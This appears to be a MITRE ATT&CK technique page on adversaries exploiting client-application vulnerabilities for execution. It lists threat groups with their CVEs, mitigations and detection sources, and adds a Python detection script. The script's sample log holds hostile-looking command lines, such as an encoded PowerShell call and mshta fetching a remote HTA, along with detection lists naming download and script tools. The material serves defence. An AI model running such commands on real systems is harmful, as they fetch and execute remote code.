Adversaries may exploit software vulnerabilities in client applications to execute code. Vulnerabilities can exist in software due to insecure coding practices that can lead to unanticipated behavior. Adversaries can take advantage of certain vulnerabilities through targeted exploitation for the purpose of arbitrary code execution. Oftentimes the most valuable exploits to an offensive toolkit are those that can be used to obtain code execution on a remote system because they can be used to gain access to that system. Users will expect to see files related to the applications they commonly use to do work, so those applications are a useful target for exploit research and development because of their high utility.
Several types exist:
Web browsers are a common target through Drive-by Compromise and Spearphishing Link. Endpoint systems may be compromised through normal web browsing or from certain users being targeted by links in spearphishing emails to adversary controlled sites used to exploit the web browser. These often do not require an action by the user for the exploit to be executed.
Common office and productivity applications such as Microsoft Office are also targeted through Phishing. Malicious files will be transmitted directly as attachments or through links to download them. These require the user to open the document or file for the exploit to run.
Other applications that are commonly seen or are part of the software deployed in a target network may also be used for exploitation. Applications such as Adobe Reader and Flash, which are common in enterprise environments, have been routinely targeted by adversaries attempting to gain access to systems. Depending on the software and nature of the vulnerability, some may be exploited in the browser or require the user to open a file. For instance, some Flash exploits have been delivered as objects within Microsoft Office documents.
ID | Name | Description |
---|---|---|
G0018 | admin@338 | admin@338 has exploited client software vulnerabilities for execution, such as Microsoft Word CVE-2012-0158.[1] |
S0331 | Agent Tesla | Agent Tesla has exploited Office vulnerabilities such as CVE-2017-11882 and CVE-2017-8570 for execution during delivery.[2] |
G0138 | Andariel | Andariel has exploited numerous ActiveX vulnerabilities, including zero-days.[3][4][5] |
G1007 | Aoqin Dragon | Aoqin Dragon has exploited CVE-2012-0158 and CVE-2010-3333 for execution against targeted systems.[6] |
G0005 | APT12 | APT12 has exploited multiple vulnerabilities for execution, including Microsoft Office vulnerabilities (CVE-2009-3129, CVE-2012-0158) and vulnerabilities in Adobe Reader and Flash (CVE-2009-4324, CVE-2009-0927, CVE-2011-0609, CVE-2011-0611).[7][8] |
G0007 | APT28 | APT28 has exploited Microsoft Office vulnerability CVE-2017-0262 for execution.[9] |
G0016 | APT29 | APT29 has used multiple software exploits for common client software, like Microsoft Word, Exchange, and Adobe Reader, to gain code execution.[10][11][12] |
G0022 | APT3 | APT3 has exploited the Adobe Flash Player vulnerability CVE-2015-3113 and Internet Explorer vulnerability CVE-2014-1776.[13][14] |
G0050 | APT32 | APT32 has used RTF documents that include an exploit (CVE-2017-11882) to execute malicious code.[15] |
G0064 | APT33 | APT33 has attempted to exploit a known vulnerability in WinRAR (CVE-2018-20250), and attempted to gain remote code execution via a security bypass vulnerability (CVE-2017-11774).[16][17] |
G0067 | APT37 | APT37 has used exploits for Flash Player (CVE-2016-4117, CVE-2018-4878), Word (CVE-2017-0199), Internet Explorer (CVE-2020-1380 and CVE-2020-26411), and Microsoft Edge (CVE-2021-26411) for execution.[18][19][20][21] |
G0096 | APT41 | APT41 leveraged the following exploits in their operations: CVE-2012-0158, CVE-2015-1641, CVE-2017-0199, CVE-2017-11882, and CVE-2019-3396.[22] |
G0001 | Axiom | Axiom has used exploits for multiple vulnerabilities including CVE-2014-0322, CVE-2012-4792, CVE-2012-1889, and CVE-2013-3893.[23] |
S0239 | Bankshot | Bankshot leverages a known zero-day vulnerability in Adobe Flash to execute the implant on the victims' machines.[24] |
G1002 | BITTER | BITTER has exploited Microsoft Office vulnerabilities CVE-2012-0158, CVE-2017-11882, CVE-2018-0798, and CVE-2018-0802.[25][26] |
G0098 | BlackTech | BlackTech has exploited multiple vulnerabilities for execution, including Microsoft Office vulnerabilities CVE-2012-0158, CVE-2014-6352, CVE-2017-0199, and Adobe Flash CVE-2015-5119.[27] |
G0060 | BRONZE BUTLER | BRONZE BUTLER has exploited Microsoft Office vulnerabilities CVE-2014-4114, CVE-2018-0802, and CVE-2018-0798 for execution.[28][29] |
G0080 | Cobalt Group | Cobalt Group has exploited multiple vulnerabilities for execution, including Microsoft's Equation Editor (CVE-2017-11882), an Internet Explorer vulnerability (CVE-2018-8174), CVE-2017-8570, CVE-2017-0199, and CVE-2017-8759.[30][31][32][33][34][35][36][37] |
S0154 | Cobalt Strike | Cobalt Strike can exploit Oracle Java vulnerabilities for execution, including CVE-2011-3544, CVE-2013-2465, CVE-2012-4681, and CVE-2013-2460.[38][39] |
G0142 | Confucius | Confucius has exploited Microsoft Office vulnerabilities, including CVE-2015-1641, CVE-2017-11882, and CVE-2018-0802.[40][41] |
G0012 | Darkhotel | Darkhotel has exploited Adobe Flash vulnerability CVE-2015-8651 for execution.[42] |
S0243 | DealersChoice | DealersChoice leverages vulnerable versions of Flash to perform execution.[43] |
G0035 | Dragonfly | Dragonfly has exploited CVE-2011-0611 in Adobe Flash Player to gain execution on a targeted system.[44] |
G0066 | Elderwood | Elderwood has used exploitation of endpoint software, including Microsoft Internet Explorer and Adobe Flash vulnerabilities, to gain execution. They have also used zero-day exploits.[45] |
G1003 | Ember Bear | Ember Bear has used exploits to enable follow-on execution of frameworks such as Meterpreter.[46] |
S0396 | EvilBunny | EvilBunny has exploited CVE-2011-4369, a vulnerability in the PRC component in Adobe Reader.[47] |
G1011 | EXOTIC LILY | EXOTIC LILY has used malicious documents containing exploits for CVE-2021-40444 affecting Microsoft MSHTML.[48] |
C0001 | Frankenstein | During Frankenstein, the threat actors exploited CVE-2017-11882 to execute code on the victim's machine.[49] |
S0391 | HAWKBALL | HAWKBALL has exploited Microsoft Office vulnerabilities CVE-2017-11882 and CVE-2018-0802 to deliver the payload.[50] |
G0126 | Higaisa | |
G0100 | Inception | Inception has exploited CVE-2012-0158, CVE-2014-1761, CVE-2017-11882, and CVE-2018-0802 for execution.[52][53][54][55] |
S0260 | InvisiMole | InvisiMole has installed legitimate but vulnerable Total Video Player software and wdigest.dll library drivers on compromised hosts to exploit stack overflow and input validation vulnerabilities for code execution.[56] |
G0032 | Lazarus Group | Lazarus Group has exploited Adobe Flash vulnerability CVE-2018-4878 for execution.[24] |
G0065 | Leviathan | Leviathan has exploited multiple Microsoft Office and .NET vulnerabilities for execution, including CVE-2017-0199, CVE-2017-8759, and CVE-2017-11882.[57][58][59][60] |
G0069 | MuddyWater | MuddyWater has exploited the Office vulnerability CVE-2017-0199 for execution.[61] |
G0129 | Mustang Panda | Mustang Panda has exploited CVE-2017-0199 in Microsoft Word to execute code.[62] |
C0016 | Operation Dust Storm | During Operation Dust Storm, the threat actors exploited Adobe Flash vulnerability CVE-2011-0611, Microsoft Windows Help vulnerability CVE-2010-1885, and several Internet Explorer vulnerabilities, including CVE-2011-1255, CVE-2012-1889, and CVE-2014-0322.[63] |
G0040 | Patchwork | Patchwork uses malicious documents to deliver remote execution exploits as part of. The group has previously exploited CVE-2017-8570, CVE-2012-1856, CVE-2014-4114, CVE-2017-0199, CVE-2017-11882, and CVE-2015-1641.[64][65][66][67][68][69][70] |
S0458 | Ramsay | Ramsay has been embedded in documents exploiting CVE-2017-0199, CVE-2017-11882, and CVE-2017-8570.[71][72] |
G1031 | Saint Bear | Saint Bear has leveraged vulnerabilities in client applications such as CVE-2017-11882 in Microsoft Office to enable code execution in victim environments.[73] |
G0034 | Sandworm Team | Sandworm Team has exploited vulnerabilities in Microsoft PowerPoint via OLE objects (CVE-2014-4114) and Microsoft Word via crafted TIFF images (CVE-2013-3906).[74][75][76] |
G0121 | Sidewinder | Sidewinder has exploited vulnerabilities to gain execution, including CVE-2017-11882 and CVE-2020-0674.[77][78] |
S0374 | SpeakUp | SpeakUp attempts to exploit the following vulnerabilities in order to execute its malicious script: CVE-2012-0874, CVE-2010-1871, CVE-2017-10271, CVE-2018-2894, CVE-2016-3088, JBoss AS 3/4/5/6, and the Hadoop YARN ResourceManager.[79] |
S0578 | SUPERNOVA | SUPERNOVA was installed via exploitation of a SolarWinds Orion API authentication bypass vulnerability (CVE-2020-10148).[80][81] |
G0062 | TA459 | TA459 has exploited Microsoft Word vulnerability CVE-2017-0199 for execution.[82] |
G0089 | The White Company | The White Company has taken advantage of a known vulnerability in Microsoft Word (CVE-2012-0158) to execute code.[83] |
G0027 | Threat Group-3390 | Threat Group-3390 has exploited CVE-2018-0798 in Equation Editor.[84] |
G0131 | Tonto Team | Tonto Team has exploited Microsoft vulnerabilities, including CVE-2018-0798, CVE-2018-8174, CVE-2018-0802, CVE-2017-11882, CVE-2019-9489, CVE-2020-8468, and CVE-2018-0798 to enable execution of their delivered malicious payloads.[85][86][87][88] |
G0134 | Transparent Tribe | Transparent Tribe has crafted malicious files to exploit CVE-2012-0158 and CVE-2010-3333 for execution.[89] |
G0081 | Tropic Trooper | Tropic Trooper has executed commands through Microsoft security vulnerabilities, including CVE-2017-11882, CVE-2018-0802, and CVE-2012-0158.[90][91] |
S1154 | VersaMem | VersaMem was installed through exploitation of CVE-2024-39717 in Versa Director servers.[92] |
S1065 | Woody RAT | Woody RAT has relied on CVE-2022-30190 (Follina) for execution during delivery.[93] |
S0341 | Xbash | Xbash can attempt to exploit known vulnerabilities in Hadoop, Redis, or ActiveMQ when it finds those services running in order to conduct further execution.[94][95] |
ID | Mitigation | Description |
---|---|---|
M1048 | Application Isolation and Sandboxing | Browser sandboxes can be used to mitigate some of the impact of exploitation, but sandbox escapes may still exist.[96][97] Other types of virtualization and application microsegmentation may also mitigate the impact of client-side exploitation. Risks of additional exploits and weaknesses in those systems may still exist.[97] |
M1050 | Exploit Protection | Security applications that look for behavior used during exploitation, such as Windows Defender Exploit Guard (WDEG) and the Enhanced Mitigation Experience Toolkit (EMET), can be used to mitigate some exploitation behavior.[98] Control flow integrity checking is another way to potentially identify and stop a software exploit from occurring.[99] Many of these protections depend on the architecture and target application binary for compatibility. |
M1051 | Update Software | Perform regular software updates to mitigate exploitation risk. Keeping software up-to-date with the latest security patches helps prevent adversaries from exploiting known vulnerabilities in client software, reducing the risk of successful attacks. |
ID | Data Source | Data Component | Detects |
---|---|---|---|
DS0015 | Application Log | Application Log Content | Monitor log entries from browsers, Office applications, and third-party applications for suspicious behavior, such as crashes, abnormal terminations, or instability that could indicate an attempted exploit. Analytic 1: logs related to application crashes or unexpected behavior, which could signal an attempt to exploit vulnerabilities. |
DS0022 | File | File Modification | Monitor file system changes associated with exploitation, such as suspicious files dropped by browsers, Office apps, or third-party programs, which can be used for further stages of an attack. Analytic 1: identifies file creations or modifications associated with commonly exploited software. |
DS0029 | Network Traffic | Network Traffic Flow | Look for unusual outbound connections following abnormal process execution, as this could indicate an adversary has established a foothold and is initiating communication with C2 infrastructure. Analytic 1: monitors for network traffic generated by exploited processes. |
DS0009 | Process | Process Creation | Identify abnormal child processes spawned by applications commonly targeted by exploits, such as browsers or Office programs, particularly those launched with suspicious arguments or into unknown directories. For example, it is not expected behavior for the print spooler service to execute discovery-type processes. This is only one example; the parent could be any number of native or third-party processes executing unusual or unknown (potentially adversary-brought) processes. Analytic 1 (Office Application Process Execution): look for instances where Office applications (e.g., Word, Excel, PowerPoint) are launched with suspicious parameters or from unusual locations. Analytic 2 (Unusual Child Process Creation): look for abnormal child process creation by Office applications, especially when accompanied by suspicious command-line parameters. |
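The two Process Creation analytics above (Office application launched from an unusual location or with suspicious parameters; abnormal child process of an Office application) can be expressed as a small detection script. The following is an added example, not code from ATT&CK or from any vendor: it runs over constructed, Sysmon-style JSON process-creation records embedded inline. The set of Office binaries, the expected install paths, the list of interpreters an Office process should never spawn, and the command-line heuristics are all assumptions made for the illustration and would be tuned to a real environment.

```python
"""Added example: detection analytics for client-application exploitation (T1203)
over constructed Sysmon-style process-creation records. Not ATT&CK's own code."""
import json
import re
from dataclasses import dataclass

# Office binaries commonly targeted by document exploits (assumed list).
OFFICE_APPS = {"winword.exe", "excel.exe", "powerpnt.exe", "outlook.exe", "eqnedt32.exe"}

# Interpreters and utilities an Office process normally never spawns (assumed list).
ABNORMAL_CHILDREN = {
    "cmd.exe", "powershell.exe", "pwsh.exe", "wscript.exe", "cscript.exe",
    "mshta.exe", "rundll32.exe", "regsvr32.exe", "certutil.exe", "bitsadmin.exe",
}

# Directories where Office binaries are expected to live (assumed default install paths).
EXPECTED_OFFICE_DIRS = (
    r"c:\program files\microsoft office",
    r"c:\program files (x86)\microsoft office",
    r"c:\program files\common files\microsoft shared\equation",
    r"c:\program files (x86)\common files\microsoft shared\equation",
)

# Command-line fragments treated as suspicious by both analytics (assumed heuristics).
SUSPICIOUS_ARGS = re.compile(
    r"(-enc(odedcommand)?\b|downloadstring|invoke-expression|\biex\b|https?://)", re.I
)


@dataclass
class ProcEvent:
    pid: int
    image: str          # full path of the new process
    cmdline: str        # its command line
    parent_image: str   # full path of the parent process


def _basename(path: str) -> str:
    """Lower-cased file name of a Windows path."""
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def parse_log(text: str) -> list[ProcEvent]:
    """Parse JSON-lines process-creation records; blank lines are skipped."""
    events = []
    for line in text.splitlines():
        if line.strip():
            rec = json.loads(line)
            events.append(ProcEvent(rec["pid"], rec["image"], rec["cmdline"], rec["parent_image"]))
    return events


def analytic1_office_launch(ev: ProcEvent) -> list[str]:
    """Analytic 1: Office application launched from an unusual location or with suspicious parameters."""
    if _basename(ev.image) not in OFFICE_APPS:
        return []
    reasons = []
    if not ev.image.lower().startswith(EXPECTED_OFFICE_DIRS):
        reasons.append(f"office binary outside expected install path: {ev.image}")
    if SUSPICIOUS_ARGS.search(ev.cmdline):
        reasons.append("suspicious launch parameters")
    return reasons


def analytic2_office_child(ev: ProcEvent) -> list[str]:
    """Analytic 2: abnormal child process of an Office application, worse with suspicious arguments."""
    if _basename(ev.parent_image) not in OFFICE_APPS:
        return []
    reasons = []
    child = _basename(ev.image)
    if child in ABNORMAL_CHILDREN:
        reasons.append(f"{_basename(ev.parent_image)} spawned {child}")
    if SUSPICIOUS_ARGS.search(ev.cmdline):
        reasons.append("suspicious child command line")
    return reasons


def scan(log_text: str) -> list[dict]:
    """Run both analytics over a log; one alert per (event, analytic) that fires."""
    alerts = []
    for ev in parse_log(log_text):
        for name, fn in (("Analytic 1", analytic1_office_launch), ("Analytic 2", analytic2_office_child)):
            reasons = fn(ev)
            if reasons:
                alerts.append({"pid": ev.pid, "analytic": name, "reasons": reasons})
    return alerts


# Constructed sample records: one benign Word launch, one benign Excel child (print helper),
# two abnormal children of Office binaries, and Word running from a user temp directory.
SAMPLE_LOG = r'''
{"pid": 4120, "image": "C:\\Program Files\\Microsoft Office\\root\\Office16\\WINWORD.EXE", "cmdline": "\"WINWORD.EXE\" /n \"C:\\Users\\alice\\Documents\\budget.docx\"", "parent_image": "C:\\Windows\\explorer.exe"}
{"pid": 4188, "image": "C:\\Windows\\splwow64.exe", "cmdline": "splwow64.exe 8192", "parent_image": "C:\\Program Files\\Microsoft Office\\root\\Office16\\EXCEL.EXE"}
{"pid": 5020, "image": "C:\\Windows\\System32\\cmd.exe", "cmdline": "cmd.exe /c powershell -enc QUJD", "parent_image": "C:\\Program Files\\Microsoft Office\\root\\Office16\\WINWORD.EXE"}
{"pid": 5077, "image": "C:\\Windows\\System32\\mshta.exe", "cmdline": "mshta.exe http://example.invalid/x.hta", "parent_image": "C:\\Program Files (x86)\\Common Files\\Microsoft Shared\\EQUATION\\EQNEDT32.EXE"}
{"pid": 5130, "image": "C:\\Users\\alice\\AppData\\Local\\Temp\\WINWORD.EXE", "cmdline": "WINWORD.EXE", "parent_image": "C:\\Windows\\explorer.exe"}
'''

if __name__ == "__main__":
    for alert in scan(SAMPLE_LOG):
        print(alert)
```

On the sample records the script raises three alerts: Analytic 2 for the cmd.exe and mshta.exe children of Office binaries, and Analytic 1 for WINWORD.EXE running from a temp directory; the benign Word launch and the Excel print helper produce none. Both analytics return a list of reasons rather than a boolean so that a downstream rule can weight an abnormal child that also carries a suspicious command line higher than either signal alone.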